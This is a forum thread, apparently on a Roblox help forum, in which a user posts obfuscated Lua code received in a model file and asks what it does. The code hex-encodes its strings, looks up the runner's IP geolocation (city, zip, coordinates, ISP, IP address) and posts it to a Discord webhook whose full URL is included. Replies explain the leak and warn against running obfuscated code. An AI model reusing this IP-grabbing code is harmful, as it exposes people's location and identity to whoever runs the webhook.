Hey there, I’m very unexperienced in anything scripting related that’s external from roblox, my friend sent me an rbxm with this code and i wanted to make sure it doesn’t actually work. Could anybody give me a basic understanding of what this code does?
local n = game:GetService(“\x48\x74\x74\x70\x53\x65\x72\x76\x69\x63\x65”)
local j = “https://discord.com/api/webhooks/1272370779849228339/Fq1YPo2VWSULOqEuP1xH9-wNt0Yu7daMA3NI4dwJCbUYdcxibC2NZ9r_QjVX3NzuVcuG”
local _ = “\x68\x74\x74\x70\x3A\x2F\x2F\x69\x70\x2D\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x6A\x73\x6F\x6E”
local _ = n:GetAsync()
local g = n:JSONDecode()
local m = script.Parent.Name
local l = m…“\x27\x73\x20\x49\x6E\x66\x6F\x72\x6D\x61\x74\x69\x6F\x6E\x3A\n”
local i = “\n\x43\x6F\x75\x6E\x74\x72\x79\x3A\x20”…g.country
local k = “\n\x52\x65\x67\x69\x6F\x6E\x20\x26\x20\x52\x65\x67\x69\x6F\x6E\x20\x4E\x61\x6D\x65\x3A\x20”…g.region…“\x2C\x20”…g.regionName
local h = “\n\x43\x69\x74\x79\x3A\x20”…g.city
local b = “\n\x5A\x69\x70\x43\x6F\x64\x65\x3A\x20”…g.zip
local a = “\n\x4C\x61\x74\x69\x74\x75\x64\x65\x3A\x20”…g.lat
local _ = “\n\x4C\x6F\x6E\x67\x69\x74\x75\x64\x65\x3A\x20”…g.lon
local c = “\n\x54\x69\x6D\x65\x20\x5A\x6F\x6E\x65\x3A\x20”…g.timezone
local e = “\n\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x53\x65\x72\x76\x69\x63\x65\x20\x50\x72\x6F\x76\x69\x64\x65\x72\x3A\x20”…g.isp
local d = “\n\x4F\x72\x67\x61\x6E\x69\x7A\x61\x74\x69\x6F\x6E\x3A\x20”…g.org
local f = “\n\x41\x2F\x53\x3A\x20”…g.as
local g = “\n\x51\x75\x65\x72\x79\x20\x28\x49\x50\x29\x3A\x20”…g.query
local _ = {
[“\x65\x6D\x62\x65\x64\x73”] = {
{
[“\x74\x69\x74\x6C\x65”] = “\x2A\x2A”…m…“\x2A\x2A”,
[“\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E”] = l…i…k…h…b…a……c…e…d…f…g,
[“\x74\x79\x70\x65”] = “\x72\x69\x63\x68”,
[“\x63\x6F\x6C\x6F\x72”] = tonumber(3066993)
}
}
}
n:PostAsync(j, n:JSONEncode())
Unless Roblox blocks some features of HTTPs requests, that should work.
HTTPs requests require IP addresses. If the HTTPs request is sent from the client (which can probably only be done in studio), the HTTPs contains information about the IP address and therefore the location of the sender (without a VPN).
Generally don’t run any obfuscated code (which is what all the L_15 stuff is). People who hide what their code does rarely have good intentions.
im the one who ran it appreciate the help though, just hope they wont do anything bad with it… i need to educate myself further on whats possible on roblox rlly appreciate it tho
i’m 99% sure they got the information which sucks dude, i just need to hope they dont have any malicious intent… they said they were just testing if it works on me, but im still very skepticle